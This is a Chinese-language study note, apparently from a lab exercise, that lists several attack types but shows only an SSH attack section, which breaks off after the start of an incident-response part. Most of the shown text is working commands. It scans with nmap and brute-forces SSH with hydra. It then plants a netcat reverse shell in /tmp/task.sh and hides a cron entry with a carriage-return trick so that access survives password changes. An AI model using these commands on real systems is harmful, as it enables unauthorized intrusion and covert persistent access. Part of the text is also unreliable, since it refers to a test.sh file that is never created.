(本文仅为学习记录,请不要做违法犯罪行为)
目录
一、SSH远程攻击
二、sql注入
三、xss漏洞
四、文件上传漏洞
五、文件包含漏洞
一、SSH远程攻击
攻击机:192.168.xxx.130
靶机:10.133.xxx.159(目标主机)
0、信息收集,端口扫描(发现22端口开放,尝试爆破ssh)
nmap 10.133.xxx.159
1、使用hydra进行爆破
hydra -L users.txt -P password.txt ssh://10.133.xxx.159
2、拿到用户名和密码,登录靶机
ssh [email protected]
3、创建隐藏计划任务
进入/tmp目录创建 task.sh 文件
#!/bin/bash
nc 192.168.xxx.130 7777 -e /bin/bash(反弹shell的脚本)
查看task.sh权限 ls -l task.sh
4、增加执行权限
chmod +x task.sh
5、创建计划任务test.sh(*表示每隔一分钟就执行task.sh文件)
(crontab -l;printf "* * * * * /tmp/task.sh;\rno crontw-wab for `whoami`%100c\n")|crontab -
6、同样给test.sh增加执行权限
chmod +x test.sh
7、重新打开一个终端(尝试nc链接目标主机的shell)
输入命令:nc -lvp 7777(开启监听)
8、为什么要搞个计划任务来反弹shell
避免对方修改密码后或者关机后而连不上ssh(权限维持)
################################################(以上操作都在攻击机上实现)
目标主机进行应急响应
1、netstat -antpl 查看连接
发现有可疑的外部ip连接